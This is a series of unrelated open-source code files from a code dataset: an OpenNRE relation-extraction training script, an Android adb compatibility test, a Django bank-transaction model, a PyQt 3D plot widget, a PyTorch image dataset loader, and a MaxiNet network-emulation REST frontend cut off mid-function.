description\n","sub_path":"python/python_cli2/tests/test_param.py","file_name":"test_param.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"352919619","text":"# coding:utf-8\nimport sys, json\nimport torch\nimport os\nimport numpy as np\nimport opennre\nimport argparse\nimport logging\nimport random\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--ckpt', default='', \n help='Checkpoint name')\nparser.add_argument('--result', default='', \n help='Save result name')\nparser.add_argument('--only_test', action='store_true', \n help='Only run test')\n\n# Data\nparser.add_argument('--metric', default='auc', choices=['micro_f1', 'auc'],\n help='Metric for picking up best checkpoint')\nparser.add_argument('--dataset', default='none', choices=['none', 'wiki_distant', 'nyt10', 'nyt10m', 'wiki20m'],\n help='Dataset. If not none, the following args can be ignored')\nparser.add_argument('--train_file', default='', type=str,\n help='Training data file')\nparser.add_argument('--val_file', default='', type=str,\n help='Validation data file')\nparser.add_argument('--test_file', default='', type=str,\n help='Test data file')\nparser.add_argument('--rel2id_file', default='', type=str,\n help='Relation to ID file')\n\n# Bag related\nparser.add_argument('--bag_size', type=int, default=0,\n help='Fixed bag size. If set to 0, use original bag sizes')\n\n# Hyper-parameters\nparser.add_argument('--batch_size', default=160, type=int,\n help='Batch size')\nparser.add_argument('--lr', default=0.1, type=float,\n help='Learning rate')\nparser.add_argument('--optim', default='sgd', type=str,\n help='Optimizer')\nparser.add_argument('--weight_decay', default=1e-5, type=float,\n help='Weight decay')\nparser.add_argument('--max_length', default=128, type=int,\n help='Maximum sentence length')\nparser.add_argument('--max_epoch', default=100, type=int,\n help='Max number of training epochs')\n\n# Others\nparser.add_argument('--seed', default=42, type=int,\n help='Random seed')\n\n# Exp\nparser.add_argument('--encoder', default='pcnn', choices=['pcnn', 'cnn'])\nparser.add_argument('--aggr', default='att', choices=['one', 'att', 'avg'])\n\nargs = parser.parse_args()\n\n# Set random seed\nset_seed(args.seed)\n\n# Some basic settings\nroot_path = '.'\nsys.path.append(root_path)\nif not os.path.exists('ckpt'):\n os.mkdir('ckpt')\nif len(args.ckpt) == 0:\n args.ckpt = '{}_{}'.format(args.dataset, 'pcnn_att')\nckpt = 'ckpt/{}.pth.tar'.format(args.ckpt)\n\nif args.dataset != 'none':\n opennre.download(args.dataset, root_path=root_path)\n args.train_file = os.path.join(root_path, 'benchmark', args.dataset, '{}_train.txt'.format(args.dataset))\n args.val_file = os.path.join(root_path, 'benchmark', args.dataset, '{}_val.txt'.format(args.dataset))\n if not os.path.exists(args.val_file):\n logging.info(\"Cannot find the validation file. Use the test file instead.\")\n args.val_file = os.path.join(root_path, 'benchmark', args.dataset, '{}_test.txt'.format(args.dataset))\n args.test_file = os.path.join(root_path, 'benchmark', args.dataset, '{}_test.txt'.format(args.dataset))\n args.rel2id_file = os.path.join(root_path, 'benchmark', args.dataset, '{}_rel2id.json'.format(args.dataset))\nelse:\n if not (os.path.exists(args.train_file) and os.path.exists(args.val_file) and os.path.exists(args.test_file) and os.path.exists(args.rel2id_file)):\n raise Exception('--train_file, --val_file, --test_file and --rel2id_file are not specified or files do not exist. Or specify --dataset')\n\nlogging.info('Arguments:')\nfor arg in vars(args):\n logging.info(' {}: {}'.format(arg, getattr(args, arg)))\n\nrel2id = json.load(open(args.rel2id_file))\n\n# Download glove\nopennre.download('glove', root_path=root_path)\nword2id = json.load(open(os.path.join(root_path, 'pretrain/glove/glove.6B.50d_word2id.json')))\nword2vec = np.load(os.path.join(root_path, 'pretrain/glove/glove.6B.50d_mat.npy'))\n\n# Define the sentence encoder\nif args.encoder == 'pcnn':\n sentence_encoder = opennre.encoder.PCNNEncoder(\n token2id=word2id,\n max_length=args.max_length,\n word_size=50,\n position_size=5,\n hidden_size=230,\n blank_padding=True,\n kernel_size=3,\n padding_size=1,\n word2vec=word2vec,\n dropout=0.5\n )\nelif args.encoder == 'cnn':\n sentence_encoder = opennre.encoder.CNNEncoder(\n token2id=word2id,\n max_length=args.max_length,\n word_size=50,\n position_size=5,\n hidden_size=230,\n blank_padding=True,\n kernel_size=3,\n padding_size=1,\n word2vec=word2vec,\n dropout=0.5\n )\nelse:\n raise NotImplementedError\n\n\n# Define the model\nif args.aggr == 'att':\n model = opennre.model.BagAttention(sentence_encoder, len(rel2id), rel2id)\nelif args.aggr == 'avg':\n model = opennre.model.BagAverage(sentence_encoder, len(rel2id), rel2id)\nelif args.aggr == 'one':\n model = opennre.model.BagOne(sentence_encoder, len(rel2id), rel2id)\nelse:\n raise NotImplementedError\n\n# Define the whole training framework\nframework = opennre.framework.BagRE(\n train_path=args.train_file,\n val_path=args.val_file,\n test_path=args.test_file,\n model=model,\n ckpt=ckpt,\n batch_size=args.batch_size,\n max_epoch=args.max_epoch,\n lr=args.lr,\n weight_decay=args.weight_decay,\n opt=args.optim,\n bag_size=args.bag_size)\n\n# Train the model\nif not args.only_test:\n framework.train_model(args.metric)\n\n# Test the model\nframework.load_state_dict(torch.load(ckpt)['state_dict'])\nresult = framework.eval_model(framework.test_loader)\n\n# Print the result\nlogging.info('Test set results:')\nlogging.info('AUC: %.5f' % (result['auc']))\nlogging.info('Maximum micro F1: %.5f' % (result['max_micro_f1']))\nlogging.info('Maximum macro F1: %.5f' % (result['max_macro_f1']))\nlogging.info('Micro F1: %.5f' % (result['micro_f1']))\nlogging.info('Macro F1: %.5f' % (result['macro_f1']))\nlogging.info('P@100: %.5f' % (result['p@100']))\nlogging.info('P@200: %.5f' % (result['p@200']))\nlogging.info('P@300: %.5f' % (result['p@300']))\n\n# Save precision/recall points\nnp.save('result/{}_p.npy'.format(args.result), result['np_prec'])\nnp.save('result/{}_r.npy'.format(args.result), result['np_rec'])\njson.dump(result['max_micro_f1_each_relation'], open('result/{}_mmicrof1_rel.json'.format(args.result), 'w'), ensure_ascii=False)\n","sub_path":"example/train_bag_cnn.py","file_name":"train_bag_cnn.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"284657187","text":"#!/usr/bin/env python\n# Copyright 2016 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\nfrom __future__ import print_function\n\nimport contextlib\nimport os\nimport posixpath\nimport random\nimport signal\nimport sys\nimport unittest\n\n_CATAPULT_BASE_DIR = os.path.abspath(\n os.path.join(os.path.dirname(__file__), '..', '..', '..', '..'))\n\nsys.path.append(os.path.join(_CATAPULT_BASE_DIR, 'devil'))\nfrom devil import devil_env\nfrom devil.android import device_errors\nfrom devil.android import device_test_case\nfrom devil.android.sdk import adb_wrapper\nfrom devil.utils import cmd_helper\nfrom devil.utils import timeout_retry\n\n_TEST_DATA_DIR = os.path.abspath(\n os.path.join(os.path.dirname(__file__), 'test', 'data'))\n\n\ndef _hostAdbPids():\n ps_status, ps_output = cmd_helper.GetCmdStatusAndOutput(\n ['pgrep', '-l', 'adb'])\n if ps_status != 0:\n return []\n\n pids_and_names = (line.split() for line in ps_output.splitlines())\n return [int(pid) for pid, name in pids_and_names if name == 'adb']\n\n\nclass AdbCompatibilityTest(device_test_case.DeviceTestCase):\n @classmethod\n def setUpClass(cls):\n custom_adb_path = os.environ.get('ADB_PATH')\n custom_deps = {\n 'config_type': 'BaseConfig',\n 'dependencies': {},\n }\n if custom_adb_path:\n custom_deps['dependencies']['adb'] = {\n 'file_info': {\n devil_env.GetPlatform(): {\n 'local_paths': [custom_adb_path],\n },\n },\n }\n devil_env.config.Initialize(configs=[custom_deps])\n\n def testStartServer(self):\n # Manually kill off any instances of adb.\n adb_pids = _hostAdbPids()\n for p in adb_pids:\n os.kill(p, signal.SIGKILL)\n\n self.assertIsNotNone(\n timeout_retry.WaitFor(\n lambda: not _hostAdbPids(), wait_period=0.1, max_tries=10))\n\n # start the adb server\n start_server_status, _ = cmd_helper.GetCmdStatusAndOutput(\n [adb_wrapper.AdbWrapper.GetAdbPath(), 'start-server'])\n\n # verify that the server is now online\n self.assertEquals(0, start_server_status)\n self.assertIsNotNone(\n timeout_retry.WaitFor(\n lambda: bool(_hostAdbPids()), wait_period=0.1, max_tries=10))\n\n def testKillServer(self):\n adb_pids = _hostAdbPids()\n if not adb_pids:\n adb_wrapper.AdbWrapper.StartServer()\n\n adb_pids = _hostAdbPids()\n self.assertGreaterEqual(len(adb_pids), 1)\n\n kill_server_status, _ = cmd_helper.GetCmdStatusAndOutput(\n [adb_wrapper.AdbWrapper.GetAdbPath(), 'kill-server'])\n self.assertEqual(0, kill_server_status)\n\n adb_pids = _hostAdbPids()\n self.assertEqual(0, len(adb_pids))\n\n def testDevices(self):\n devices = adb_wrapper.AdbWrapper.Devices()\n self.assertNotEqual(0, len(devices), 'No devices found.')\n\n def getTestInstance(self):\n \"\"\"Creates a real AdbWrapper instance for testing.\"\"\"\n return adb_wrapper.AdbWrapper(self.serial)\n\n def testShell(self):\n under_test = self.getTestInstance()\n shell_ls_result = under_test.Shell('ls')\n self.assertIsInstance(shell_ls_result, str)\n self.assertTrue(bool(shell_ls_result))\n\n def testShell_failed(self):\n under_test = self.getTestInstance()\n with self.assertRaises(device_errors.AdbShellCommandFailedError):\n under_test.Shell('ls /foo/bar/baz')\n\n def testShell_externalStorageDefined(self):\n under_test = self.getTestInstance()\n external_storage = under_test.Shell('echo $EXTERNAL_STORAGE')\n self.assertIsInstance(external_storage, str)\n self.assertTrue(posixpath.isabs(external_storage))\n\n @contextlib.contextmanager\n def getTestPushDestination(self, under_test):\n \"\"\"Creates a temporary directory suitable for pushing to.\"\"\"\n external_storage = under_test.Shell('echo $EXTERNAL_STORAGE').strip()\n if not external_storage:\n self.skipTest('External storage not available.')\n while True:\n random_hex = hex(random.randint(0, 2**52))[2:]\n name = 'tmp_push_test%s' % random_hex\n path = posixpath.join(external_storage, name)\n try:\n under_test.Shell('ls %s' % path)\n except device_errors.AdbShellCommandFailedError:\n break\n under_test.Shell('mkdir %s' % path)\n try:\n yield path\n finally:\n under_test.Shell('rm -rf %s' % path)\n\n def testPush_fileToFile(self):\n under_test = self.getTestInstance()\n with self.getTestPushDestination(under_test) as push_target_directory:\n src = os.path.join(_TEST_DATA_DIR, 'push_file.txt')\n dest = posixpath.join(push_target_directory, 'push_file.txt')\n with self.assertRaises(device_errors.AdbShellCommandFailedError):\n under_test.Shell('ls %s' % dest)\n under_test.Push(src, dest)\n self.assertEquals(dest, under_test.Shell('ls %s' % dest).strip())\n\n def testPush_fileToDirectory(self):\n under_test = self.getTestInstance()\n with self.getTestPushDestination(under_test) as push_target_directory:\n src = os.path.join(_TEST_DATA_DIR, 'push_file.txt')\n dest = push_target_directory\n resulting_file = posixpath.join(dest, 'push_file.txt')\n with self.assertRaises(device_errors.AdbShellCommandFailedError):\n under_test.Shell('ls %s' % resulting_file)\n under_test.Push(src, dest)\n self.assertEquals(resulting_file,\n under_test.Shell('ls %s' % resulting_file).strip())\n\n def testPush_directoryToDirectory(self):\n under_test = self.getTestInstance()\n with self.getTestPushDestination(under_test) as push_target_directory:\n src = os.path.join(_TEST_DATA_DIR, 'push_directory')\n dest = posixpath.join(push_target_directory, 'push_directory')\n with self.assertRaises(device_errors.AdbShellCommandFailedError):\n under_test.Shell('ls %s' % dest)\n under_test.Push(src, dest)\n self.assertEquals(\n sorted(os.listdir(src)),\n sorted(under_test.Shell('ls %s' % dest).strip().split()))\n\n def testPush_directoryToExistingDirectory(self):\n under_test = self.getTestInstance()\n with self.getTestPushDestination(under_test) as push_target_directory:\n src = os.path.join(_TEST_DATA_DIR, 'push_directory')\n dest = push_target_directory\n resulting_directory = posixpath.join(dest, 'push_directory')\n with self.assertRaises(device_errors.AdbShellCommandFailedError):\n under_test.Shell('ls %s' % resulting_directory)\n under_test.Shell('mkdir %s' % resulting_directory)\n under_test.Push(src, dest)\n self.assertEquals(\n sorted(os.listdir(src)),\n sorted(under_test.Shell('ls %s' % resulting_directory).split()))\n\n # TODO(jbudorick): Implement tests for the following:\n # taskset -c\n # devices [-l]\n # pull\n # shell\n # ls\n # logcat [-c] [-d] [-v] [-b]\n # forward [--remove] [--list]\n # jdwp\n # install [-l] [-r] [-s] [-d]\n # install-multiple [-l] [-r] [-s] [-d] [-p]\n # uninstall [-k]\n # backup -f [-apk] [-shared] [-nosystem] [-all]\n # restore\n # wait-for-device\n # get-state (BROKEN IN THE M SDK)\n # get-devpath\n # remount\n # reboot\n # reboot-bootloader\n # root\n # emu\n\n @classmethod\n def tearDownClass(cls):\n print('')\n print('')\n print('tested %s' % adb_wrapper.AdbWrapper.GetAdbPath())\n print(' %s' % adb_wrapper.AdbWrapper.Version())\n print('connected devices:')\n try:\n for d in adb_wrapper.AdbWrapper.Devices():\n print(' %s' % d)\n except device_errors.AdbCommandFailedError:\n print(' ')\n raise\n finally:\n print('')\n\n\nif __name__ == '__main__':\n sys.exit(unittest.main())\n","sub_path":"devil/devil/android/sdk/adb_compatibility_devicetest.py","file_name":"adb_compatibility_devicetest.py","file_ext":"py","file_size_in_byte":7627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"591648239","text":"from django.db.models import Sum, F, When, Case, BooleanField, FloatField\nfrom django.db import models, transaction as db_transaction\nfrom django.apps import apps\n\nfrom ...utils.mt940 import parse_mt940, parse_mt940_transaction_details\nfrom ..base import CroesusQueryset\n\n__all__ = [\n 'Transaction',\n]\n\n\nclass TransactionQuerySet(CroesusQueryset):\n PRETTYTABLE_FIELDS = [\n 'pk',\n 'amount',\n 'date',\n 'person',\n 'purpose',\n 'bookings_amount',\n 'bookable',\n ]\n\n def match_ibans(self):\n for transaction in self.iterator():\n transaction.match_iban()\n\n\nclass TransactionManager(models.Manager):\n def get_queryset(self):\n return TransactionQuerySet(\n self.model,\n using=self._db,\n ).annotate(\n bookings_amount=Sum('bookings__amount'),\n ).annotate(\n underbooked=Case(\n When(bookings_amount__isnull=True, then=True),\n When(bookings_amount__lt=F('amount'), then=True),\n output_field=BooleanField(),\n default=False,\n ),\n booked=Case(\n When(bookings_amount__gte=F('amount'), then=True),\n output_field=BooleanField(),\n default=False,\n ),\n overbooked=Case(\n When(bookings_amount__gt=F('amount'), then=True),\n output_field=BooleanField(),\n default=False,\n ),\n bookable=Case(\n When(bookings_amount__isnull=False,\n then=F('amount') - F('bookings_amount')),\n output_field=FloatField(),\n default=F('amount'),\n ),\n )\n\n @db_transaction.atomic\n def parse_statement(self, statement, parse_details=True, match_ibans=True):\n dates = [i[0] for i in self.values_list('date')]\n objects = []\n\n mt940_transactions = parse_mt940(statement.data)\n\n bank_code, account_number =\\\n mt940_transactions.data['account_identification'].split('/')\n\n for mt940_transaction in parse_mt940(statement.data):\n data = mt940_transaction.data\n\n # skip dataset if date is already known to the database\n # this is to avoid glitches\n if data['date'] in dates:\n continue\n\n final_opening_balance = data.get('final_opening_balance', None)\n final_closing_balance = data.get('final_closing_balance', None)\n\n if final_opening_balance:\n final_opening_balance = final_opening_balance.amount.amount\n\n if final_closing_balance:\n final_closing_balance = final_closing_balance.amount.amount\n\n objects.append(Transaction(\n statement=statement,\n bank_code=bank_code,\n account_number=account_number,\n date=data['date'],\n amount=float(data['amount'].amount),\n details=data['transaction_details'],\n currency=data['currency'],\n final_opening_balance=final_opening_balance,\n final_closing_balance=final_closing_balance,\n ))\n\n if objects:\n if parse_details or match_ibans:\n for obj in objects:\n if parse_details:\n obj.parse_details(save=False)\n\n if match_ibans:\n obj.match_iban(save=False)\n\n self.bulk_create(objects)\n\n return len(objects)\n\n\nclass Transaction(models.Model):\n objects = TransactionManager()\n\n # data\n statement = models.ForeignKey('croesus_core.Statement', blank=True,\n null=True, verbose_name='Statement')\n\n created = models.DateTimeField(auto_now_add=True, editable=False)\n\n # parsed data\n amount = models.FloatField(blank=True, null=True)\n currency = models.CharField(max_length=8, blank=True, null=True)\n date = models.DateField(blank=True, null=True)\n bank_code = models.CharField(max_length=16, blank=True, null=True)\n account_number = models.CharField(max_length=16, blank=True, null=True)\n details = models.TextField(blank=True, null=True)\n\n final_opening_balance = models.FloatField(blank=True, null=True)\n final_opening_balance_date = models.DateField(blank=True, null=True)\n\n final_closing_balance = models.FloatField(blank=True, null=True)\n final_closing_balance_date = models.DateField(blank=True, null=True)\n\n # data parsed from details\n name = models.CharField(max_length=128, blank=True, null=True)\n purpose = models.TextField(blank=True, null=True)\n\n iban = models.CharField(max_length=30, blank=True, null=True,\n verbose_name='IBAN')\n\n bic = models.CharField(max_length=11, blank=True, null=True,\n verbose_name='BIC')\n\n person = models.ForeignKey('croesus_core.Person', blank=True, null=True,\n verbose_name='Person')\n\n # additional data\n comment = models.TextField(blank=True, null=True)\n\n def get_bookings_amount(self):\n return self.bookings.aggregate(Sum('amount'))['amount__sum'] or 0.0\n\n def get_bookable(self):\n bookings_amount = self.get_bookings_amount()\n\n if bookings_amount >= self.amount:\n return 0.0\n\n return self.amount - self.get_bookings_amount()\n\n def is_underbooked(self):\n return self.get_bookings_amount() < self.amount\n\n def is_booked(self):\n return self.get_bookings_amount() >= self.amount\n\n def is_overbooked(self):\n return self.get_bookings_amount() > self.amount\n\n def parse_details(self, save=True):\n details = parse_mt940_transaction_details(self.details,\n bank_code=self.bank_code)\n\n for key, value in details.items():\n setattr(self, key, value)\n\n if save:\n self.save()\n\n def match_iban(self, save=True):\n PersonAccount = apps.get_model('croesus_core', 'PersonAccount')\n\n if not self.iban:\n return\n\n pa = PersonAccount.objects.filter(iban=self.iban)\n\n if pa.count() == 1:\n self.person = pa[0].person\n\n if save:\n self.save()\n\n def book(self, account, amount=None, date=None):\n Booking = apps.get_model('croesus_core', 'Booking')\n\n return Booking.objects.create(\n transaction=self,\n account=account,\n amount=amount or self.get_bookable(),\n date=date,\n )\n\n def donate(self, amount=None, date=None):\n Account = apps.get_model('croesus_core', 'Account')\n\n return self.book(\n account=Account.objects.get_donation_account(),\n amount=amount,\n date=date,\n )\n\n def __str__(self):\n return 'pk={}, date={}, person={}, amount={}'.format(\n self.pk, self.date, self.person or self.name, self.amount)\n","sub_path":"croesus_core/models/bank/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":7078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"329671858","text":"from PyQt5.QtWidgets import *\nimport os\nimport random\n\n\nfrom numpy import arange, sin, pi\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom PyQt5 import QtCore, QtWidgets\n\n\nclass MyMplCanvas(FigureCanvas):\n \"\"\"Ultimately, this is a QWidget (as well as a FigureCanvasAgg, etc.).\"\"\"\n\n def __init__(self, parent=None, width=5, height=4, dpi=100):\n fig = Figure(figsize=(width, height), dpi=dpi)\n self.axes = fig.gca(projection='3d')\n\n self.compute_initial_figure()\n\n FigureCanvas.__init__(self, fig)\n self.setParent(parent)\n\n FigureCanvas.setSizePolicy(self,\n QtWidgets.QSizePolicy.Expanding,\n QtWidgets.QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n def compute_initial_figure(self):\n pass\n\nclass MyDynamicMplCanvas(MyMplCanvas):\n \"\"\"A canvas that updates itself every second with a new plot.\"\"\"\n\n plot_length = 10\n num_lines = 1\n lines = [[range(10), range(10)] for i in range(0, 1)]\n colours = ['r', 'b', 'y', 'c', 'g', 'm', 'k', '#ee00ff', '#00feee', '#ffee00']\n colours_dim = ['#ffaaaa', 'b', 'y', 'c', 'g', 'm', 'k', '#ee00ff', '#00feee', '#ffee00']\n\n def __init__(self, *args, **kwargs):\n MyMplCanvas.__init__(self, *args, **kwargs)\n timer = QtCore.QTimer(self)\n timer.timeout.connect(self.update_figure)\n timer.start(10000)\n\n def update_and_plot(self):\n\n for i in range(0, self.num_lines):\n self.lines[i][0] = [random.randint(0, 10) for i in range(self.plot_length)]\n self.lines[i][1] = [random.randint(0, 10) for i in range(self.plot_length)]\n\n zeros = [0 for i in range(0,10)]\n maxes = [10 for i in range(0, 10)]\n\n for i in range(0, self.num_lines):\n self.axes.plot(range(self.plot_length), self.lines[i][0], zeros, color=self.colours_dim[i])\n self.axes.plot(zeros, self.lines[i][0], zs=self.lines[i][1], color=self.colours_dim[i])\n self.axes.plot(range(self.plot_length), maxes, zs=self.lines[i][1], color=self.colours_dim[i])\n\n self.axes.plot(range(self.plot_length), self.lines[i][0], zs=self.lines[i][1], color=self.colours[i])\n\n\n def compute_initial_figure(self):\n self.update_and_plot()\n\n def update_figure(self):\n # Build a list of 4 random integers between 0 and 10 (both inclusive)\n self.axes.cla()\n self.update_and_plot()\n self.draw()\n\nclass SingleRender(QGroupBox):\n def __init__(self, *args, **kwargs):\n self.title_name = kwargs.pop(\"Title\")\n super().__init__(*args, **kwargs)\n\n layout = QVBoxLayout()\n\n self.title_label = QLabel(self.title_name)\n\n layout.addWidget(self.title_label)\n\n #l = QtWidgets.QVBoxLayout(self.main_widget)\n dc = MyDynamicMplCanvas( width=5, height=4, dpi=100)\n layout.addWidget(dc)\n\n\n self.setLayout(layout)","sub_path":"single_render.py","file_name":"single_render.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"649312222","text":"import os\n\nimport PIL\nimport pandas as pd\nimport torch\nfrom torch.utils.data import Dataset\n\n\nclass TagImageDataset(Dataset):\n def __init__(self, data_frame: pd.DataFrame, root_dir: str, transform=None):\n self.data_frame = data_frame\n self.root_dir = root_dir\n self.transform = transform\n\n def __len__(self):\n return len(self.data_frame)\n\n def __getitem__(self, idx):\n sample = dict()\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n img_name = self.data_frame.iloc[idx]['file_name']\n img_path = os.path.join(self.root_dir, img_name)\n image = PIL.Image.open(img_path).convert('RGB')\n if self.transform:\n image = self.transform(image)\n sample['image'] = image\n cat_name = self.data_frame.iloc[idx]['answer']\n sample['label'] = cat_name\n sample['image_name'] = img_name\n return sample\n\n\nclass TagImageInferenceDataset(Dataset):\n def __init__(self, root_dir: str, transform=None):\n self.root_dir = root_dir\n self.transform = transform\n self.data_list = [img for img in os.listdir(self.root_dir) if not img.startswith('.')]\n\n def __len__(self):\n return len(self.data_list)\n\n def __getitem__(self, idx):\n sample = dict()\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n img_name = self.data_list[idx]\n img_path = os.path.join(self.root_dir, img_name)\n image = PIL.Image.open(img_path).convert('RGB')\n if self.transform:\n image = self.transform(image)\n sample['image'] = image\n sample['image_name'] = img_name\n return sample","sub_path":"iitp_category/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"433824625","text":"#!/usr/bin/python\n# Copyright 2017 Telstra Open Source\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\nfrom bottle import get, post, request, run, Bottle, response, request, error, abort\n\nfrom mininet.topo import Topo\nfrom mininet.node import OVSSwitch\n\nfrom MaxiNet.Frontend import maxinet\nfrom MaxiNet.tools import Tools\n\nfrom jsonschema import validate, ValidationError\nimport logging\nimport json\nimport socket\n\ncluster_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"minWorkers\": {\n \"type\": \"integer\"\n },\n \"maxWorkers\": {\n \"type\": \"integer\"\n }\n },\n \"required\": [\n \"name\",\n \"minWorkers\",\n \"maxWorkers\"\n ]\n}\n\nexperiment_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"cluster\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n },\n },\n \"topo\": {\n \"type\": \"object\",\n \"properties\": {\n \"hosts\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n },\n },\n },\n \"switches\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n },\n },\n },\n \"links\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n },\n },\n },\n },\n },\n },\n \"required\": [\n \"name\",\n \"cluster\",\n \"topo\"\n ]\n}\n\nhost_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"pos\": {\n \"type\": \"string\"\n },\n },\n \"required\": [\n \"name\",\n \"pos\"\n ]\n}\n\nswitch_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"workerId\": {\n \"type\": \"integer\"\n }\n },\n \"required\": [\n \"name\",\n \"workerId\"\n ]\n}\n\nlink_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"node1\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"type\": {\n \"type\": \"string\"\n },\n },\n },\n \"node2\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"type\": {\n \"type\": \"string\"\n },\n },\n }\n },\n \"required\": [\n \"node1\",\n \"node2\"\n ]\n}\n\n@error(500)\ndef error_handler_500(error):\n return json.dumps({\"message\": str(error.exception)})\n\n@error(400)\ndef error_handler_400(error):\n return json.dumps({\"message\": str(error.exception)})\n\n@post('/frontend/cluster')\ndef create_cluster():\n try:\n logger.debug(\"creating cluster with json={}\"\n .format(request.json))\n validate(request.json, cluster_schema)\n name = _create_cluster(request.json)\n response.content_type = 'application/json'\n response.status = 201\n response.set_header('Location', \"http://frontend/cluster/{}\".format(name))\n return json.dumps({'name': name})\n except ValidationError as e:\n abort(400, e.message)\n\ndef _create_cluster(cluster):\n name = cluster['name']\n minWorkers = cluster['minWorkers']\n maxWorkers = cluster['maxWorkers']\n logger.debug(\"creating cluster with minWorkers={}, maxWorkers={}\"\n .format(minWorkers, maxWorkers))\n c = maxinet.Cluster(minWorkers = minWorkers, maxWorkers = maxWorkers)\n clusters[name] = c\n return name\n\ndef create_topo(topo):\n t = Topo()\n\n i = 1\n for host in topo['hosts']:\n logger.debug(\"add host {} to topo\" .format(host['name']))\n t.addHost(host['name'], ip=Tools.makeIP(i), mac=Tools.makeMAC(i))\n i += 1\n\n i = 1\n for switch in topo['switches']:\n logger.debug(\"add switch {} to topo\" .format(switch['name']))\n t.addSwitch(switch['name'], dpid=Tools.makeDPID(i))\n i += 1\n\n i = 1\n for link in topo['links']:\n logger.debug(\"add link from {} to {} to topo\" .format(link['node1']['name'], link['node2']['name']))\n t.addLink(link['node1']['name'], link['node2']['name'])\n i += 1\n\n return t\n\n\n@post('/frontend/experiment')\ndef create_experiment():\n try:\n validate(request.json, experiment_schema)\n name = _create_experiment(request.json['name'], request.json['cluster'], request.json['topo'])\n response.content_type = 'application/json'\n response.status = 201\n response.set_header('Location', \"http://frontend/experiment/{}\".format(name))\n return json.dumps({'name': name})\n except ValidationError as e:\n abort(400, e.message)\n\ndef _create_experiment(name, cluster, topo):\n logger.debug(\"creating experiment with name={}, cluster={}\"\n .format(name, cluster['name']))\n c = clusters[cluster['name']]\n t = create_topo(topo)\n experiment = maxinet.Experiment(c, t, switch=OVSSwitch)\n experiments[name] = experiment\n return name\n\n@get('/experiment/setup/')\ndef setup_experiment(name):\n logger.debug(\"setup experiment with name={}\" .format(name))\n experiment = experiments[name]\n experiment.setup()\n response.content_type = 'application/json'\n return json.dumps({'name': name})\n\n@get('/experiment/stop/')\ndef stop_experiment(name):\n logger.debug(\"stop experiment with name={}\" .format(name))\n experiment = experiments[name]\n experiment.stop()\n response.content_type = 'application/json'\n return json.dumps({'name': name})\n\n@get('/experiment/run///')\ndef setup_experiment(name, node, command):\n logger.debug(\"run command experiment={}, node={}, command={}\" .format(name, node, command))\n experiment = experiments[name]\n output = experiment.get_node(node).cmd(command)\n response.content_type = 'application/json'\n return json.dumps({'name': name, 'node': node, 'command': command, 'output': output})\n\n@post('/experiment//host')\ndef create_host(experiment):\n try:\n validate(request.json, host_schema)\n host = _create_host(experiment, request.json)\n response.content_type = 'application/json'\n response.status = 201\n response.set_header('Location', \"http://experiment/{}/host/{}\".format(experiment, host.name))\n return json.dumps({'name': host.name, 'type': 'HOST'})\n except ValidationError as e:\n abort(400, e.message)\n\ndef _create_host(experiment, host):\n logger.debug(\"creating host for experiment={}, host={}, pos={}\"\n .format(experiment, host['name'], host['pos']))\n exp = experiments[experiment]\n host_id = len(exp.hosts) + 1\n hst = exp.addHost(host['name'], ip=Tools.makeIP(host_id), max=Tools.makeMAC(host_id), pos=host['pos'])\n return hst\n\n@post('/experiment//switch')\ndef create_switch(experiment):\n try:\n 